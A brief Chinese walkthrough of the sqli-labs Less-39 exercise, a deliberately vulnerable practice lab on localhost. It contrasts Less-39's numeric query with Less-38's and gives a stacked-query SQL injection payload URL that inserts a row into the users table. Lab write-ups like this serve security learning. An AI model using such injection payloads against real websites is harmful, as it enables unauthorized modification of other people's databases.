Less-39 和less-38的区别在于sql语句的不一样:SELECT * FROM users WHERE id=$id LIMIT 0,1 也就是数字型注入,我们可以构造以下的payload: http://127.0.0.1/sqli-labs/Less-39/index.php?id=1;insert%20into%20users(id,username,password)%20values%20(%2739%27,%27less39%27,%27hello%27)--+ 通过数据表中可以看到添加的less-39项。 相关文章: 2021-09-24 2021-07-06 2021-11-25 2021-12-29 2021-10-16 2021-10-27 2021-10-18 2021-12-10